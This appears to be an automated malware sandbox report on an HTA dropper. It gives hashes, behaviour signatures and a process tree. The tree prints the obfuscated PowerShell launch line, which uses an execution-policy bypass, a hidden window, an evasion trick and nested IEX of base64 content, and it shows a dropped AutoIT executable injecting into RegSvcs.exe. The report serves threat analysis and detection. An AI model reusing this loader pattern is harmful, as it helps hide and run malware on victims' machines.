Analysis
max time kernel: 150s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23/10/2024, 06:06
Static task: static1
Behavioral task: behavioral1
  Sample: greatthingswithgreatideasgivenmerestthignstgood.hta
  Resource: win7-20241010-en
Behavioral task: behavioral2
  Sample: greatthingswithgreatideasgivenmerestthignstgood.hta
  Resource: win10v2004-20241007-en
General
Target: greatthingswithgreatideasgivenmerestthignstgood.hta
Size: 130KB
MD5: b507badbce69dc67d803b7f3b1385036
SHA1: b15c7634732a783b64414505ac4a5c095405f886
SHA256: 80b9bfa671f8626c76da94f0f39a03987278bd32e40851068a399bc69a4e05ca
SHA512: a844a487906193c9265b67d7f3b1b617de3f227c205e043a1238cca7dbb9c1782480b001bd68de97cc86597e13205466bd433771b681d9b64bb4404f67f1abd3
SSDEEP: 96:Eam7xBVS9Mrv6VS9qrvpDCFl/Aoy58VS9sVS9QSrvdVS967T:Ea2xBQ9Gv6Q9wvaoiQ9sQ9QIvdQ9QT
Malware Config
Signatures
Blocklisted process makes network request (1 IoC)
  flow 21 | pid 5048 | process POWershEll.EXe
Downloads MZ/PE file
Evasion via Device Credential Deployment (2 IoCs)
  pid 5048 | process POWershEll.EXe
  pid 3696 | process powershell.exe
Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation | process mshta.exe
Executes dropped EXE (1 IoC)
  pid 2356 | process wlanext.exe
AutoIT Executable (1 IoC)
  AutoIT scripts compiled to PE executables.
  resource behavioral2/files/0x000f000000023b50-75.dat | yara_rule autoit_exe
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
Program crash (1 IoC)
  pid 3612 | process WerFault.exe | pid_target 2356 | procid_target 98
System Location Discovery: System Language Discovery (1 TTP, 6 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | process mshta.exe
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | process POWershEll.EXe
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | process powershell.exe
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | process csc.exe
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | process cvtres.exe
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | process wlanext.exe
Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid 5048 | process POWershEll.EXe (2 entries)
  pid 3696 | process powershell.exe (2 entries)
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege | pid 5048 | process POWershEll.EXe
  Token: SeDebugPrivilege | pid 3696 | process powershell.exe
Suspicious use of FindShellTrayWindow (2 IoCs)
  pid 2356 | process wlanext.exe (2 entries)
Suspicious use of SendNotifyMessage (2 IoCs)
  pid 2356 | process wlanext.exe (2 entries)
Suspicious use of WriteProcessMemory (18 IoCs; each parent/child pair below is logged three times)
  PID 3564 wrote to memory of 5048 | pid 3564 | process mshta.exe | procid_target 85
  PID 5048 wrote to memory of 3696 | pid 5048 | process POWershEll.EXe | procid_target 89
  PID 5048 wrote to memory of 3540 | pid 5048 | process POWershEll.EXe | procid_target 92
  PID 3540 wrote to memory of 1872 | pid 3540 | process csc.exe | procid_target 95
  PID 5048 wrote to memory of 2356 | pid 5048 | process POWershEll.EXe | procid_target 98
  PID 2356 wrote to memory of 5056 | pid 2356 | process wlanext.exe | procid_target 99
Processes (indentation shows the process tree depth)
[depth 1] C:\Windows\SysWOW64\mshta.exe (PID 3564)
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greatthingswithgreatideasgivenmerestthignstgood.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  [depth 2] C:\Windows\SysWOW64\wINDoWSpoWeRsheLL\v1.0\POWershEll.EXe (PID 5048)
    Command line: "C:\Windows\SystEM32\wINDoWSpoWeRsheLL\v1.0\POWershEll.EXe" "pOwERsHell.eXe -Ex BYpASs -nop -W 1 -c DeViCECREDENTIALDEploymENt ; ieX($(IEX('[syStem.teXt.encoDiNG]'+[ChAr]0X3A+[chAr]58+'UTf8.geTSTriNG([SysteM.cOnVeRt]'+[ChaR]0X3a+[cHAR]58+'FRoMbasE64STRiNg('+[CHaR]34+'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'+[char]34+'))')))"
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    [depth 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3696)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpASs -nop -W 1 -c DeViCECREDENTIALDEploymENt
      - Evasion via Device Credential Deployment
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe (PID 3540)
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\luwjyflo\luwjyflo.cmdline"
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      [depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe (PID 1872)
        Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6CD3.tmp" "c:\Users\Admin\AppData\Local\Temp\luwjyflo\CSC4B235646806A45B095E8FFE49E519249.TMP"
        - System Location Discovery: System Language Discovery
    [depth 3] C:\Users\Admin\AppData\Roaming\wlanext.exe (PID 2356)
      Command line: "C:\Users\Admin\AppData\Roaming\wlanext.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of WriteProcessMemory
      [depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (PID 5056)
        Command line: "C:\Users\Admin\AppData\Roaming\wlanext.exe"
      [depth 4] C:\Windows\SysWOW64\WerFault.exe (PID 3612)
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2356 -s 752
        - Program crash
[depth 1] C:\Windows\SysWOW64\WerFault.exe (PID 4728)
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2356 -ip 2356
Network
MITRE ATT&CK Enterprise v15
Downloads